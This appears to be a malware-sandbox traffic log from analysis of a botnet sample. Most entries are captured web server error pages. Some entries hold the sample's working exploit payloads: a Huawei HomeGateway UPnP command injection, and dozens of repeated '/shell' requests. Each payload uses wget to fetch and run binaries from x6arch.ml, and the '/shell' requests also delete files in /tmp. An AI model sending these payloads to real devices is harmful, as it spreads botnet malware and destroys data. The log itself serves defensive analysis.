        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:09:23 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:09:25 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 c4ccb6ba9c26c6d3f28325cb5cfea5cc.cloudfront.net (CloudFront)X-Amz-Cf-Pop: FJR50-C1X-Amz-Cf-Id: 26RO5nxm5z6bg0bb1sGjQ-VXPN0gUTQXJ0clnZYnB-uYhcQyywo6uw==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 32 36 52 4f 35 6e 78 6d 35 7a 36 62 67 30 62 62 31 73 47 6a 51 2d 56 58 50 4e 30 67 55 54 51 58 4a 30 63 6c 6e 5a 59 6e 42 2d 75 59 68 63 51 79 79 77 6f 36 75 77 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 21 Mar 2022 19:09:25 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:09:25 GMTServer: ApacheVary: Accept-EncodingContent-Length: 203Keep-Alive: timeout=15, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:09:30 GMTContent-Type: application/json; charset=utf-8Connection: keep-aliveContent-Length: 48X-Kong-Response-Latency: 0Server: kong/2.2.1Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 6e 6f 20 52 6f 75 74 65 20 6d 61 74 63 68 65 64 20 77 69 74 68 20 74 68 6f 73 65 20 76 61 6c 75 65 73 22 7d Data Ascii: {"message":"no Route matched with those values"}
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:09:34 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sun, 18 Jan 1970 21:55:05 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:09:34 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: 1XUdzc3d3iString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: 1XUdzc3d3iString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
        Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: unknownDNS traffic detected: queries for: deathnet.tk
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
        Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ x6arch.ml/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 2.56.59.78:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
